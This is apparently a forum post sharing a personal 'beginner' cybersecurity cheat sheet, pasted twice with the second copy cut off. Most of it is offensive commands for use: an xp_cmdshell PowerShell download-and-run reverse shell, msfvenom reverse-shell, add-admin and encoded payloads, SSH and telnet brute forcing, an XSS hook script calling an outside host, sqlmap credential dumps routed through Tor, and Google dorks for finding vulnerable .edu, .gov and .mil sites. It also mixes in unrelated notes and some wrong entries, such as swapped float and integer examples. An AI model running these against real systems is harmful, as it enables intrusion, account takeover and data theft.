Search
Member List
Calendar
Help
So i had a old document laying around where i used to write down some important stuff and just read it and think these are some good stuff for a beginner to learn to get familiar with CyberSec
░██████╗░██████╗░███████╗██╗░░░██╗██╗░░██╗░█████╗░██╗░░░██╗███╗░░██╗██████╗░
██╔════╝░██╔══██╗██╔════╝╚██╗░██╔╝██║░░██║██╔══██╗██║░░░██║████╗░██║██╔══██╗
██║░░██╗░██████╔╝█████╗░░░╚████╔╝░███████║██║░░██║██║░░░██║██╔██╗██║██║░░██║
██║░░╚██╗██╔══██╗██╔══╝░░░░╚██╔╝░░██╔══██║██║░░██║██║░░░██║██║╚████║██║░░██║
╚██████╔╝██║░░██║███████╗░░░██║░░░██║░░██║╚█████╔╝╚██████╔╝██║░╚███║██████╔╝
░╚═════╝░╚═╝░░╚═╝╚══════╝░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░░╚═════╝░╚═╝░░╚══╝╚═════╝░
forwarding port 8086 "ssh patrick@devzat.htb -i id_rsa -L 8086:127.0.0.1:8086"
sudo tcpdump -i tun0 icmp
x86_64 = 64 bit
amd64 = 64 bit
32-bit = 32 bit
ifconfig / ip a /ping
SMBMAP
sudo smbmap -H 10.10.10.27 -u " " -p " "
sudo smbclient \\\\10.10.10.27\\backups
sudo vim /etc/smb/smb.conf
mssqlclient.py
python3 mssqclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
SELECT IS_SRVROLEMEMBER ('sysadmin')
enable_xp_cmdshell
EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
sudo chmod +x Invoke-PowerShellTcpOneLine.ps1
sudo python3 -m http.server 80
sudo nc -lvnp 443 (netcat)
sudo apt install -y ufw
sudo ufw enable
sudo ufw allow from 10.10.10.27 proto tcp to any port 80,443
sudo ufw status
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.35/Invoke-PowerShellTcpOneLine.ps1\");""
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
python3 psexec.py administrator@10.10.10.27
TELNET SPOOFING
use auxiliary/server/capture/telnet
set srvhost 192.168.0.102
set banner Welcome to Hacking Articles
exploit
TELNET BRUTE FORCING
use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set rhosts 192.168.0.196
msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt
msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(telnet_login) > set stop_on_success true
msf auxiliary(telnet_login) > exploit
GOBUSTER
(scan for directorys) gobuster dir -w /usr/share/dirb/wordlists/common.txt -u 10.129.55.56
(scan for subdomains) gobuster vhost -u http://horizontall.htb/ -w /home/greyhound/Desktop/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
(scan for php directorys) gobuster dir -u http://10.10.11.135/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php
gobuster dir -u previse.htb -w /opt/directory-list-lowercase-2.3-medium.txt -e -s "200,301,302,401" -x "php" -t 100
sudo wfuzz -c -f subfighter -Z -w /path/to/wordlist -u bolt.htb -H "Host: FUZZ.bolt.htb"
-------------------------------------------------------------------
NMAP
proxychains nmap -Pn -n -sT -sV <target IP>
nmap -sV 192.168.1.0/24 -p 21
nmap –sS –P0 -T1 –n host-a.hackme.org –vv –p 21–25,61,80,139,---AFP---9100
nmap -p80 --script http-waf-detect <host>
nmap -p80 --script http-waf-fingerprint <host>
nmap -sV --script vulners 10.10.10.27
sudo nmap -sS -A -Pn
-------------------------------------------------------------------
FTP/SSH CONNECT
ftp 192.168.1.1
ssh phoenixnap@185.52.53.222 –p22
(commands) get/send file.jpg
-------------------------------------------------------------------
MSFVENOM
(Meterpreter) msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
(Add user) msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
(CMD shell) msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe
(Execute command) msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
(Execute command) msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe
(Encoder) msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
(Linux payload) msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
(Linux payload) msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
(Solaris payload) msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
(MAC reverse shell) msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho
(MAC bind shell) msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho
-------------------------------------------------------------------
FTP/SERVICE BRUTEFORCING
hydra: hydra -L users.txt -P passwords.txt ftp://192.168.1.1
patator: patator (module ex ftp_login) host=192.168.1.1 user=FILE0 password=FILE1 0=users.txt 1=passwords.txt
-------------------------------------------------------------------
CROSS-SITE SCRIPTING
<script>alert("Hello")</script>
<script src="http://192.168.1.128:3000/hook.js"></script> - (HOOK URL)
<script>document.location.href="https://imgur.com/zSYNKPT"</script>
-------------------------------------------------------------------
SQL INJECTION
sqlmap -r /home/greyhound/Desktop/sql.txt --dbs
sqlmap -r /home/greyhound/Desktop/sql.txt --dbs --fresh-queries
sqlmap -r /home/greyhound/Desktop/sql.txt -D owasp10 --tables
sqlmap -r /home/greyhound/Desktop/sql.txt -D owasp10 -T accounts --dump
sqlmap -u http://192.168.1.205/mutillidae/index.ph...r-info.php --dbs --tor --tor-port=9050 --tor-type=SOCKS5 --random-agent --check-tor
sqlmap --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -u [URL] --user-agent="unknown"
sqlmap --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -u [URL] -D [DB] --tables --user-agent="permission denied"
sqlmap --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -u [URL] -D [DB] -T admin --columns --user-agent="Windows 7 Home Premium"
sqlmap --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -u [URL] -D [DB] -T admin -C email,id,pass,user --dump --user-agent="Fedora 19"
sqlmap -u/r [url/path] -dbs [collect databases]
sqlmap -u/r [url/path] -D [specify db] --tables
sqlmap -u/r [url/path] -D [specify db] -T users --columns
sqlmap -u/r [url/path] -D [specify db] -T users -C email,name,password --dump
-------------------------------------------------------------------
METASPLOIT
use exploit/multi/handler
set Proxies SOCKS5:127.0.0.1:9050
apt update ; apt install metasploit-framework
-------------------------------------------------------------------
KAZAM
Start recording: Super + Ctrl + R.
Pause/resume recording: Super + Ctrl + P.
Finish recording: Super + Ctrl + F.
Quit recording: Super + Ctrl + Q.
-------------------------------------------------------------------
DNS
cat /etc/resolv.conf
cat /etc/network/interfaces
systemctl restart NetworkManager
systemctl restart resolvconf.service
$ sudo systemctl status resolvconf.service
$ sudo systemctl enable resolvconf.service
$ sudo systemctl start resolvconf.service
$ sudo systemctl status resolvconf.service
$ sudo nano /etc/resolvconf/resolv.conf.d/head
nameserver 103.86.96.100
nameserver 103.86.99.100
-------------------------------------------------------------------
MACCHANGER
ifconfig eth0 down/up
macchanger -r eth0
-------------------------------------------------------------------
NIKTO
nikto -h 192.168.18.132 –p 80,443 -Format msf+
nikto -h 192.168.18.132 –p 80,443 -o /home/greyhound/Desktop/scan
nikto -dbcheck -Display V -evasion 1 -Format csv -host 34.89.105.48 -p 80,433 -o /home/greyhound/Desktop/docs -Pause 5
nikto -h 34.89.105.48 –p 80,443 -o /home/greyhound/Desktop/docs -Display on
-------------------------------------------------------------------
PROGRAMS GENERAL
hydra (password cracking over protocols)
john the ripper (password/hash cracking)
wfuzz (fuzzing)
dirb (scanner)
Metagoofil (metadata collector)
gobuster (bruteforce URIs, DNS subdomains, Virtual Host names on target web servers, Open Amazon S3 buckets)
-------------------------------------------------------------------
PRORAMMING GENERAL
variable = "1" (pointing somewhere)
float = 1
integer = 1.1
boolean = true/false
a=10, b="string" = a,b = variables
function(arg1,arg2,arg3) = function
arg = An argument is the value that are sent to the function when it is called
function = A function is a block of code which only runs when it is called.
-------------------------------------------------------------------
HYDRA
-l -> Specify a username to use during brute force attack
-L -> Specify a wordlist of usernames to be used during the bruteforce attack
-p -> Specify a password to use during brute force attack
-P -> Specify a wordlist of passwords to be used during the bruteforce attack
(SSH BRUTEFORCE) $ hydra -L <path to username wordlist> -P <path to password wordlist> <IP> ssh
(SSH BRUTEFORCE) $ hydra -s <port number> -l <username> -P <path to wordlist> <IP> ssh
(SSH MASS BRUTEFORCE)$ hydra -l <username> -P <path to wordlist> -M <path to Ip list> ssh
-V verbose
-------------------------------------------------------------------
WEBSITES
https://backend.eventz.today/feeds/59ae8...on?lang=fi 18.158.93.8
https://archive.org/
https://www.yougetsignal.com/tools/web-s...eb-server/
https://sitereport.netcraft.com/
http://www.securityidiots.com/Web-Pentest
https://www.sciencedirect.com/topics/com...ence/nikto
ONLINE CRACKING
www.crackstation.net
www.cloudcracker.com
www.hash-cracker.com
www.onlinehashcrack.com
www.hashkiller.co.uk
-------------------------------------------------------------------
METASPLOITABLE
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-23 15:27 GMT
Nmap scan report for 192.168.1.205
Host is up (0.0027s latency).
Not shown: 978 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec?
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.07 seconds
HERTZ ENHETER
kHz – kilohertz – 1 000 Hz
MHz – megahertz – 1 000 000 Hz
GHz – gigahertz – 1 000 000 000 Hz
THz – terahertz – 1 000 000 000 000 Hz
-------------------------------------------------------------------
PYTHON
virtualenv flask
source bin/activate
python3 -m venv venv
source venv/bin/activate
In Python, the data type is set when you assign a value to a variable:
x = "Hello World" str
x = 20 int
x = 20.5 float
x = 1j complex
x = ["apple", "banana", "cherry"] list
x = ("apple", "banana", "cherry") tuple
x = range(6) range
x = {"name" : "John", "age" : 36} dict
x = {"apple", "banana", "cherry"} set
x = frozenset({"apple", "banana", "cherry"}) frozenset
x = True bool
x = b"Hello" bytes
x = bytearray(5) bytearray
x = memoryview(bytes(5)) memoryview
If you want to specify the data type, you can use the following constructor functions:
x = str("Hello World") str
x = int(20) int
x = float(20.5) float
x = complex(1j) complex
x = list(("apple", "banana", "cherry")) list
x = tuple(("apple", "banana", "cherry")) tuple
x = range(6) range
x = dict(name="John", age=36) dict
x = set(("apple", "banana", "cherry")) set
x = frozenset(("apple", "banana", "cherry")) frozenset
x = bool(5) bool
x = bytes(5) bytes
x = bytearray(5) bytearray
x = memoryview(bytes(5)) memoryview
-------------------------------------------------------------------
i tried a lot of things but no way.
i tried to make php file with the content upload.php running in localhost
php -S 127.0.0.1:1989 upload.php
i used curl http://<ip machine> -v
i figured out the machine time
i adjusted my local machine time to the machine time
and run this
while true; do curl http://127.0.0.1:1989 ; done > image_name.txt
when the command is running i uploaded my image to the target machine then i stopped the above command
i got a lot of name with different hashs. i tried each name in ip/images/uploads no things
and tried all name in LFI no thing also..
any idea ? !!!
-------------------------------------------------------------------
VIM
save: :w
save and exit: :wq
exit: :q
force: ! (example :w! :q!)
vertical split: open a document and then type :vsplit /path-to-document/document and this will open the specified document and split the screen so you can see both documents.
copy: y
copy a line: yy
paste: p
cut: d
cut a line: dd
-------------------------------------------------------------------
GOOGLE DORK (SQL)
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
GOOGLE DORK
site:.edu “phone number” – This Dork searches for websites on .edu domains that contain the words “phone number”. student “phone number” – This Dork searches for websites on .edu domains that contain the words “student” and “phone number”.
inurl:edu “login” – This Dork searches for websites on .edu domains that contain the words “login”. This Dork searches for school websites that contain student login information.
“powered by vbulletin” site:.edu – This Dork searches for websites on .edu domains that contain the words “powered by vbulletin”. This Dork searches for school websites that are running on the vbulletin forum software.
“powered by vbulletin” site:.gov – This Dork searches for websites on .gov domains that contain the words “powered by vbulletin”. This Dork searches for governmental websites that are running on the vbulletin forum software.
“powered by vbulletin” site:.mil – This Dork searches for websites on .mil domains that contain the words “powered by vbulletin”. This Dork searches for military websites that are running on the vbulletin forum software.
“powered by vbulletin” inurl:.edu – This Dork searches for websites on .edu domains that contain the words “powered by vbulletin”. This Dork searches for school websites that are running on the vbulletin forum software.
“powered by vbulletin” inurl:.mil – This Dork searches for websites on .mil domains that contain the words “powered by vbulletin”. This Dork searches for military websites that are running on the vbulletin forum software.
inurl:.com “powered by vbulletin” – This Dork searches for websites on .com domains that contain the words “powered by vbulletin”. This Dork searches for websites that are running on the vbulletin forum software.
inurl:.edu “register forum” – This Dork searches for websites on .edu domains that contain the words “register forum”. This Dork searches for school websites that allow you to register for a forum.
inurl:.gov “register forum” – This Dork searches for websites on .gov domains that contain the words “register forum”. This Dork searches for governmental websites that allow you to register for a forum.
░██████╗░██████╗░███████╗██╗░░░██╗██╗░░██╗░█████╗░██╗░░░██╗███╗░░██╗██████╗░
██╔════╝░██╔══██╗██╔════╝╚██╗░██╔╝██║░░██║██╔══██╗██║░░░██║████╗░██║██╔══██╗
██║░░██╗░██████╔╝█████╗░░░╚████╔╝░███████║██║░░██║██║░░░██║██╔██╗██║██║░░██║
██║░░╚██╗██╔══██╗██╔══╝░░░░╚██╔╝░░██╔══██║██║░░██║██║░░░██║██║╚████║██║░░██║
╚██████╔╝██║░░██║███████╗░░░██║░░░██║░░██║╚█████╔╝╚██████╔╝██║░╚███║██████╔╝
░╚═════╝░╚═╝░░╚═╝╚══════╝░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░░╚═════╝░╚═╝░░╚══╝╚═════╝░
forwarding port 8086 "ssh patrick@devzat.htb -i id_rsa -L 8086:127.0.0.1:8086"
sudo tcpdump -i tun0 icmp
x86_64 = 64 bit
amd64 = 64 bit
32-bit = 32 bit
ifconfig / ip a /ping
SMBMAP
sudo smbmap -H 10.10.10.27 -u " " -p " "
sudo smbclient \\\\10.10.10.27\\backups
sudo vim /etc/smb/smb.conf
mssqlclient.py
python3 mssqclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
SELECT IS_SRVROLEMEMBER ('sysadmin')
enable_xp_cmdshell
EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
sudo chmod +x Invoke-PowerShellTcpOneLine.ps1
sudo python3 -m http.server 80
sudo nc -lvnp 443 (netcat)
sudo apt install -y ufw
sudo ufw enable
sudo ufw allow from 10.10.10.27 proto tcp to any port 80,443
sudo ufw status
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.35/Invoke-PowerShellTcpOneLine.ps1\");""
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
python3 psexec.py administrator@10.10.10.27
TELNET SPOOFING
use auxiliary/server/capture/telnet
set srvhost 192.168.0.102
set banner Welcome to Hacking Articles
exploit
TELNET BRUTE FORCING
use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set rhosts 192.168.0.196
msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt
msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(telnet_login) > set stop_on_success true
msf auxiliary(telnet_login) > exploit
GOBUSTER
(scan for directorys) gobuster dir -w /usr/share/dirb/wordlists/common.txt -u 10.129.55.56
(scan for subdomains) gobuster vhost -u http://horizontall.htb/ -w /home/greyhound/Desktop/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
(scan for php directorys) gobuster dir -u http://10.10.11.135/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php
gobuster dir -u previse.htb -w /opt/directory-list-lowercase-2.3-medium.txt -e -s "200,301,302,401" -x "php" -t 100
sudo wfuzz -c -f subfighter -Z -w /path/to/wordlist -u bolt.htb -H "Host: FUZZ.bolt.htb"
-------------------------------------------------------------------
NMAP
proxychains nmap -Pn -n -sT -sV <target IP>
nmap -sV 192.168.1.0/24 -p 21
nmap –sS –P0 -T1 –n host-a.hackme.org –vv –p 21–25,61,80,139,---AFP---9100
nmap -p80 --script http-waf-detect <host>
nmap -p80 --script http-waf-fingerprint <host>
nmap -sV --script vulners 10.10.10.27
sudo nmap -sS -A -Pn
-------------------------------------------------------------------
FTP/SSH CONNECT
ftp 192.168.1.1
ssh phoenixnap@185.52.53.222 –p22
(commands) get/send file.jpg
-------------------------------------------------------------------
MSFVENOM
(Meterpreter) msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
(Add user) msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
(CMD shell) msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe
(Execute command) msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
(Execute command) msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe
(Encoder) msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
(Linux payload) msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
(Linux payload) msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
(Solaris payload) msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
(MAC reverse shell) msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho
(MAC bind shell) msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho
-------------------------------------------------------------------
FTP/SERVICE BRUTEFORCING
hydra: hydra -L users.txt -P passwords.txt ftp://192.168.1.1
patator: patator (module ex ftp_login) host=192.168.1.1 user=FILE0 password=FILE1 0=users.txt 1=passwords.txt
-------------------------------------------------------------------
CROSS-SITE SCRIPTING
<script>alert("Hello")</script>
<script src="http://192.168.1.128:3000/hook.js"></script> - (HOOK URL)
<script>document.location.href="https://imgur.com/zSYNKPT"</script>
-------------------------------------------------------------------
SQL INJECTION
sqlmap -r /home/greyhound/Desktop/sql.txt --dbs
sqlmap -r /home/greyhound/Desktop/sql.txt --dbs --fresh-queries
sqlmap -r /home/greyhound/Desktop/sql.txt -D owasp10 --tables
sqlmap -r /home/greyhound/Desktop/sql.txt -D owasp10 -T accounts --dump
sqlmap -u http://192.168.1.205/mutillidae/index.ph...r-info.php --dbs --tor --tor-port=9050 --tor-type=SOCKS5 --random-agent --check-tor
sqlmap --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -u [URL] --user-agent="unknown"
sqlmap --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -u [URL] -D [DB] --tables --user-agent="permission denied"
sqlmap --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -u [URL] -D [DB] -T admin --columns --user-agent="Windows 7 Home Premium"
sqlmap --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -u [URL] -D [DB] -T admin -C email,id,pass,user --dump --user-agent="Fedora 19"
sqlmap -u/r [url/path] -dbs [collect databases]
sqlmap -u/r [url/path] -D [specify db] --tables
sqlmap -u/r [url/path] -D [specify db] -T users --columns
sqlmap -u/r [url/path] -D [specify db] -T users -C email,name,password --dump
-------------------------------------------------------------------
METASPLOIT
use exploit/multi/handler
set Proxies SOCKS5:127.0.0.1:9050
apt update ; apt install metasploit-framework
-------------------------------------------------------------------
KAZAM
Start recording: Super + Ctrl + R.
Pause/resume recording: Super + Ctrl + P.
Finish recording: Super + Ctrl + F.
Quit recording: Super + Ctrl + Q.
-------------------------------------------------------------------
DNS
cat /etc/resolv.conf
cat /etc/network/interfaces
systemctl restart NetworkManager
systemctl restart resolvconf.service
$ sudo systemctl status resolvconf.service
$ sudo systemctl enable resolvconf.service
$ sudo systemctl start resolvconf.service
$ sudo systemctl status resolvconf.service
$ sudo nano /etc/resolvconf/resolv.conf.d/head
nameserver 103.86.96.100
nameserver 103.86.99.100
-------------------------------------------------------------------
MACCHANGER
ifconfig eth0 down/up
macchanger -r eth0
-------------------------------------------------------------------
NIKTO
nikto -h 192.168.18.132 –p 80,443 -Format msf+
nikto -h 192.168.18.132 –p 80,443 -o /home/greyhound/Desktop/scan
nikto -dbcheck -Display V -evasion 1 -Format csv -host 34.89.105.48 -p 80,433 -o /home/greyhound/Desktop/docs -Pause 5
nikto -h 34.89.105.48 –p 80,443 -o /home/greyhound/Desktop/docs -Display on
-------------------------------------------------------------------
PROGRAMS GENERAL
hydra (password cracking over protocols)
john the ripper (password/hash cracking)
wfuzz (fuzzing)
dirb (scanner)
Metagoofil (metadata collector)
gobuster (bruteforce URIs, DNS subdomains, Virtual Host names on target web servers, Open Amazon S3 buckets)
-------------------------------------------------------------------
PRORAMMING GENERAL
variable = "1" (pointing somewhere)
float = 1
integer = 1.1
boolean = true/false
a=10, b="string" = a,b = variables
function(arg1,arg2,arg3) = function
arg = An argument is the value that are sent to the function when it is called
function = A function is a block of code which only runs when it is called.
-------------------------------------------------------------------
HYDRA
-l -> Specify a username to use during brute force attack
-L -> Specify a wordlist of usernames to be used during the bruteforce attack
-p -> Specify a password to use during brute force attack
-P -> Specify a wordlist of passwords to be used during the bruteforce attack
(SSH BRUTEFORCE) $ hydra -L <path to username wordlist> -P <path to password wordlist> <IP> ssh
(SSH BRUTEFORCE) $ hydra -s <port number> -l <username> -P <path to wordlist> <IP> ssh
(SSH MASS BRUTEFORCE)$ hydra -l <username> -P <path to wordlist> -M <path to Ip list> ssh
-V verbose
-------------------------------------------------------------------
WEBSITES
https://backend.eventz.today/feeds/59ae8...on?lang=fi 18.158.93.8
https://archive.org/
https://www.yougetsignal.com/tools/web-s...eb-server/
https://sitereport.netcraft.com/
http://www.securityidiots.com/Web-Pentest
https://www.sciencedirect.com/topics/com...ence/nikto
ONLINE CRACKING
www.crackstation.net
www.cloudcracker.com
www.hash-cracker.com
www.onlinehashcrack.com
www.hashkiller.co.uk
-------------------------------------------------------------------
METASPLOITABLE
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-23 15:27 GMT
Nmap scan report for 192.168.1.205
Host is up (0.0027s latency).
Not shown: 978 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec?
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.07 seconds
HERTZ ENHETER
kHz – kilohertz – 1 000 Hz
MHz – megahertz – 1 000 000 Hz
GHz – gigahertz – 1 000 000 000 Hz
THz – terahertz – 1 000 000 000 000 Hz
-------------------------------------------------------------------
PYTHON
virtualenv flask
source bin/activate
python3 -m venv venv
source venv/bin/activate
In Python, the data type is set when you assign a value to a variable:
x = "Hello World" str
x = 20 int
x = 20.5 float
x = 1j complex
x = ["apple", "banana", "cherry"] list
x = ("apple", "banana", "cherry") tuple
x = range(6) range
x = {"name" : "John", "age" : 36} dict
x = {"apple", "banana", "cherry"} set
x = frozenset({"apple", "banana", "cherry"}) frozenset
x = True bool
x = b"Hello" bytes
x = bytearray(5) bytearray
x = memoryview(bytes(5)) memoryview
If you want to specify the data type, you can use the following constructor functions:
x = str("Hello World") str
x = int(20) int
x = float(20.5) float
x = complex(1j) complex
x = list(("apple", "banana", "cherry")) list
x = tuple(("apple", "banana", "cherry")) tuple
x = range(6) range
x = dict(name="John", age=36) dict
x = set(("apple", "banana", "cherry")) set
x = frozenset(("apple", "banana", "cherry")) frozenset
x = bool(5) bool
x = bytes(5) bytes
x = bytearray(5) bytearray
x = memoryview(bytes(5)) memoryview
-------------------------------------------------------------------
i tried a lot of things but no way.
i tried to make php file with the content upload.php running in localhost
php -S 127.0.0.1:1989 upload.php
i used curl http://<ip machine> -v
i figured out the machine time
i adjusted my local machine time to the machine time
and run this
while true; do curl http://127.0.0.1:1989 ; done > image_name.txt
when the command is running i uploaded my image to the target machine then i stopped the above command
i got a lot of name with different hashs. i tried each name in ip/images/uploads no things
and tried all name in LFI no thing also..
any idea ? !!!
-------------------------------------------------------------------
VIM
save: :w
save and exit: :wq
exit: :q
force: ! (example :w! :q!)
vertical split: open a document and then type :vsplit /path-to-document/document and this will open the specified document and split the screen so you can see both documents.
copy: y
copy a line: yy
paste: p
cut: d
cut a line: dd
-------------------------------------------------------------------
GOOGLE DORK (SQL)
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
GOOGLE DORK
site:.edu “phone number” – This Dork searches for websites on .edu domains that contain the words “phone number”. student “phone number” – This Dork searches for websites on .edu domains that contain the words “student” and “phone number”.
